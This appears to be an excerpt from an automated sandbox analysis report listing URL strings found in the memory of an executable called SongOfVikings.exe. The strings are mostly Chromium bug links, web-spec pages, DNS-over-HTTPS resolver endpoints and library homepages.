Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com/tools/smslib.html
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com/tools/smslib.html>
Source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/Public/MAPPINGS/OBSOLETE/EASTASIA/OTHER/BIG5.TXT)
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/WINDOWS/CP950.TXT
Source: SongOfVikings.exe, 00000000.00000003.1754734793.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.webrtc.org
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www8.plala.or.jp/tkubota1/unicode-symbols-map2.html
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/namespace
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/namespacehttp://www.jclark.com/xtxsl:key
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xmlsoft.org/XSLT/xsltNewExtDef
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zlib.net/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://alekberg.net/privacy
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://alekberg.net/privacyalekberg.net
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://android.com/pay
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4674
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4849
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5140
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5536
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246enableCaptureLimitsSet
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7405
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/uploadhttps://beacons.gvt2.com/domainreliability/uplo
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons2.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons3.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons4.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons5.gvt2.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons5.gvt3.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/audio-worklet)
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/audio-worklet)ScriptProcessorHandler::ProcessScriptProcessorHandler::Process
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=10201
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.fuchsia.dev/p/fuchsia/issues/detail?id=107106
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=162431
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=310299
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=912470#c31
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chrome-devtools-frontend.appspot.com/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0
Source: SongOfVikings.exe, 00000000.00000003.1903222997.0000000006526000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=af&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1903191671.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=am&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1903282171.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ar&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1904090510.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=fa&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1904126521.0000000006527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=fi&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1905010134.0000000006525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ms&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1905180838.0000000006527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=nl&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1905115227.0000000006525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=no&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1905428858.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ru&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000000.00000003.1907083686.0000000002D71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ur&category=theme81https://myactivity.google.com/myactivity/?u
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://chromium.dns.nextdns.io
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/angle/angle/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/webm/libwebp
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://cleanbrowsing.org/privacy
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/domainreliability/upload
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#clear
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#count
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://console.spec.whatwg.org/#table
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1042393
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1046462
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1060012
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1091824
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1137851
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908.
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908.The
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1144908Changing
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1300575
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1356053
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1393662).
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024selectViewInGeometryShaderThe
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547callClearTwiceUsing
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534useSystemMemoryForConstantBuffersCopying
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/705865
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/710443
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/811661
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/848952
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/v8/7848
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://creativecommons.org/licenses/by/3.0/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://datatracker.ietf.org/doc/draft-ietf-rtcweb-ip-handling.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dejavu-fonts.github.io/Download.html
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Tools/Web_Console#Styling_messages
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://developers.google.com/android/guides/setup
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.google/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.quad9.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.sb/privacy/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns10.quad9.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns11.quad9.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11(
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dns64.dns.google/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cox.net/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.dns.sb/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.opendns.com/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.quickline.ch/dns-query
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://doh.xfinity.com/dns-query
Source: SongOfVikings.exe, 00000000.00000003.1903858433.0000000006525000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ejemplo.com.Se
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunk
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-flush
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://esdiscuss.org/topic/isconstructor#content-11
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://example.org
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://example.orgExpired
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://git.io/debug_fd)
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://git.savannah.gnu.org/cgit/config.git/plain/config.guess
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://git.savannah.gnu.org/cgit/config.git/plain/config.sub
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Cyan4973/xxHash
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
